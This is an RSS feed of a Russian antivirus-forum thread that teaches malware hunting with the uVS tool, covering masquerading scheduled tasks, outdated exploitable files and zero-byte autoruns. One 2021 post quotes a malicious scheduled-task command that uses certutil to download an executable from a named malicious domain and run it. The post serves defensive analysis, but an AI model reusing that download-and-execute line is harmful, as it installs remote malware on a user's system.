<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: uVS как стать опытными пользователем этой программы.]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме uVS как стать опытными пользователем этой программы. форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Wed, 15 Apr 2026 19:02:16 +0300</pubDate>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message116648/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Можно найти угрозы проверяя записи защитника Windows - файлы в исключениях.<br />Сейчас часто можно увидеть такое ( как на фото )<br /><br />---------<br />! Маскировка под блокировщик рекламы: Adblock.xpi &nbsp; в &nbsp;Adblock.exe<br />--------- <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=127992&" width="562" height="750" /><br /><i>10.10.2023 16:25:53, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message116648/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message116648/</guid>
			<pubDate>Tue, 10 Oct 2023 16:25:53 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message115364/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Пример обнаружения антивирусом и лечения системы <br /><noindex><a href="https://forum.esetnod32.ru/messages/forum9/topic17114/message115359/#message115359" target="_blank" rel="nofollow">https://forum.esetnod32.ru/messages/forum9/topic17114/message115359/#message115359</a></noindex> <br />
			<i>08.02.2023 10:48:03, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message115364/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message115364/</guid>
			<pubDate>Wed, 08 Feb 2023 10:48:03 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message115224/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Выявление и Удаление JS/Yandex<br /><br />Например Антивирус выдаёт &nbsp;оповещение &nbsp;- как на снимке.<br /><br />Открываем uVS и через поиск находим все записи типа: CLIENTS2.GOOGLE<br /><br />и удаляем. <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=125106&" width="500" height="500" /><br /><i>05.01.2023 16:33:57, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message115224/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message115224/</guid>
			<pubDate>Thu, 05 Jan 2023 16:33:57 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message115215/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Однозначно - даже не к подозрительным, к вирусом относятся &nbsp;объекты которые 5; 10; 25 раз прописаны в задачах на запуск.<br />" Слава" "Выдающимся" &nbsp;Создателям ... ( сего чуда )<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\ACTIVATIONRULE<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\Agent Activation Runtime\AGENT ACTIVATION RUNTIMESERVICES_BK796<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\AntiMalwareSericeExecutable\ANTIMALW<WBR/>&shy;ARESERICEEXECUTABLESERVICES_BK656<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\ANTIMALWARESERVICEEXECUTABLE<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\MICROSOFTEDGEUPD<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\MicrosoftUpdateServices\MICROSOFTUPD<WBR/>&shy;ATESERVICESSERVICES_BK885<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />и т.д.<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{07E64826-A11E-4A4A-853B-672E88D38A14}\Actions<br />Actions &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{07E64826-A11E-4A4A-853B-672E88D38A14}\<br />Task &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\Agent Activation Runtime\Agent Activation RuntimeServices_bk796<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1137A4FF-839D-41ED-B7A2-DC5ECBB3509B}\Actions<br />Actions &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1137A4FF-839D-41ED-B7A2-DC5ECBB3509B}\<br />Task &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\MicrosoftEdgeUpd<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1773D39D-4B62-4382-BA67-4D6A44256D80}\Actions<br />Actions &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />и т.д. <br />
			<i>02.01.2023 16:40:31, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message115215/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message115215/</guid>
			<pubDate>Mon, 02 Jan 2023 16:40:31 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message114404/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Сейчас часто используют легальные файлы для "атаки" <br />Как правило это чистые файлы - но устаревшие. Например стоит современная\актуальная\обновлённая версия программы. Но ей подсовывают старый файл этой же программы ( со множеством узявимостей ) - которые и эксплуатируются.<br /><br />Или есть некий старый скрипт... который всю свою сознательную :) &nbsp; жизнь был чист. &nbsp;Он обращался к некому сайту... Но теперь у сайта другой владелец, или сайт был взломан.<br />-----<br />Как выявить ? Как правило работают с самыми популярными ( ежедневно используемыми на PC программами ) Браузеры и т.д. <br />Каталог\папка с этим старым дополнением будет рядом с этой программой. В том же каталоге или рядом. Большая разница по времени между созданием\изменением файла\файлов.<br />Например в каталоге с файлами 2022 года файл 2010.<br />Если есть сомнение можно файл на время переименовать. Например с updater.dll в updater.dll111<br />Чаще всего эти компоненты являются библиотеками\программными дополнениями или скриптами. <br />Так как файл чист - то и расширение файла - как правило стандартное.<br />-----<br />Если объектов в системе слишком много - переименовать\удалить всё, что не влияет на работу системы. Всё лишнее.<br />+<br />Возможно файл запускается через задачу, или автозапуск. <br />
			<i>17.08.2022 18:52:13, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message114404/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message114404/</guid>
			<pubDate>Wed, 17 Aug 2022 18:52:13 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message113430/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			...<br />Просмотр активности процессов и сетевой активности.<br /><br />Если есть проблемы со скоростью...<br /><br />Можно замерить скорость когда система работает в безопасном режиме. Например здесь: <noindex><a href="https://yandex.ru/internet/" target="_blank" rel="nofollow">https://yandex.ru/internet/</a></noindex><br />Загружаемся в безопасном режиме и проверяем = сравниваем.<br />+ Учитываем - что если включено обновление системы - то... <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=120872&" width="959" height="132" /><br /><img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=123350&" width="646" height="635" /><br /><img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=123351&" width="758" height="637" /><br /><i>02.12.2021 16:35:29, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message113430/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message113430/</guid>
			<pubDate>Thu, 02 Dec 2021 16:35:29 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message111778/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Вредоносный сайт\ресурс который антивирус ESET определяет, как: &quot; Обнаружена атака путем подделки записей кэша ARP &quot;<br />Как это выглядит в UVS.<br /><br />
====code====
<pre>HTTPS://BESTBLUES.TECH/APP/APP.EXE
C:&#92;USERS&#92;RAMZES&#92;APPDATA&#92;LOCAL&#92;TEMP&#92;CSRSS&#92;SCHEDULED.EXE</pre>
=============
<br /><br />Программа показывает два объекта.<br />Первый это ссылка на исполняемый файл. ( что само по себе подозрительно :)<br />Второй путь до &nbsp;директории: APPDATA с нелепой маскировкой под системный C:\Windows\System32\csrss.exe<br />и не менее &quot;интеллектуальной&quot; &nbsp;маскировкой SCHEDULED.EXE &nbsp; SCHEDULED<S>.EXE </S> планировщик...<br />------------<br />В развёрнутом виде это:<br /><br />
====code====
<pre>Полное имя&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ПОДОЗРИТЕЛЬНЫЙ 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
Сохраненная информация&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;на момент создания образа
Статус&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Доп. информация&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; на момент обновления списка
Файл&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;SYSTEM32&#92;CMD.EXE
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылки на объект&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылка&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HKLM&#92;Software&#92;Microsoft&#92;Windows NT&#92;CurrentVersion&#92;Schedule&#92;TaskCache&#92;Tasks&#92;{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}&#92;Actions
Actions&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe &#38;&#38; C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe /31340
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылка&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HKLM&#92;Software&#92;Microsoft&#92;Windows NT&#92;CurrentVersion&#92;Schedule&#92;TaskCache&#92;Logon&#92;{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}&#92;</pre>
=============
<br /><br />+<br /><br />
====code====
<pre>Полное имя&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;USERS&#92;RAMZES&#92;APPDATA&#92;LOCAL&#92;TEMP&#92;CSRSS&#92;SCHEDULED.EXE
Имя файла&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SCHEDULED.EXE
Тек. статус&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ПОДОЗРИТЕЛЬНЫЙ 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
Сохраненная информация&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;на момент создания образа
Статус&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ПОДОЗРИТЕЛЬНЫЙ 
Инф. о файле&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Не удается найти указанный файл. 
Цифр. подпись&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; проверка не производилась
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Статус&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Типичен для вирусов и троянов
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Доп. информация&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; на момент обновления списка
Файл&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;SYSTEM32&#92;CMD.EXE
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылки на объект&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылка&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HKLM&#92;Software&#92;Microsoft&#92;Windows NT&#92;CurrentVersion&#92;Schedule&#92;TaskCache&#92;Tasks&#92;{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}&#92;Actions
Actions&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe &#38;&#38; C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe /31340
Actions&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe &#38;&#38; C:&#92;Users&#92;RAMZES&#92;AppData&#92;Local&#92;Temp&#92;csrss&#92;scheduled.exe /31340
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Ссылка&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HKLM&#92;Software&#92;Microsoft&#92;Windows NT&#92;CurrentVersion&#92;Schedule&#92;TaskCache&#92;Logon&#92;{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}&#92;</pre>
=============
<br /><br />Подозрительные моменты: Temp; AppData; TaskCache; Csrss и т.д.<br />Из интересного задействован системный: C:\WINDOWS\SYSTEM32\CERTUTIL.EXE<br />*Certutil.exe — это программа командной строки, которая устанавливается как часть служб сертификации.<br />Проверка ссылки на V.T.: <noindex><a href="https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc86511a0e4e00248a/detection" target="_blank" rel="nofollow">https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc<WBR/>&shy;86511a0e4e00248a/detection</a></noindex> <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118588&" width="874" height="651" /><br /><i>30.01.2021 11:45:25, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message111778/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message111778/</guid>
			<pubDate>Sat, 30 Jan 2021 11:45:25 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message111753/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Вес файла: &nbsp;0 байт.<br />Такие файлы удалять можно ( особенно если они в автозагрузке) так, как это будет замедлять работу системы. Система выполняет ( пытается ) выполнить некое действие\операцию<br />с файлом у которого нет полезного функционала.<br />С файлом\нулёвкой &nbsp;может работать программа - что-то в него записывать и\или удалять.<br />Если файл нужен программе для работы то программа может его воссоздать\восстановить после удаления.<br />Если в отношении некого файла есть сомнение его можно переименовать c: DP45977C.lfl &nbsp;в DP45977C.lfl.old<br />---<br />Есть ресурсы которые показывают тип расширения и можно определить с чем мы имеем дело: open-file.ru/types/l/<br />( но не всегда можно получить результат :) <br />
			<i>29.01.2021 13:48:07, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message111753/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message111753/</guid>
			<pubDate>Fri, 29 Jan 2021 13:48:07 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message111503/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
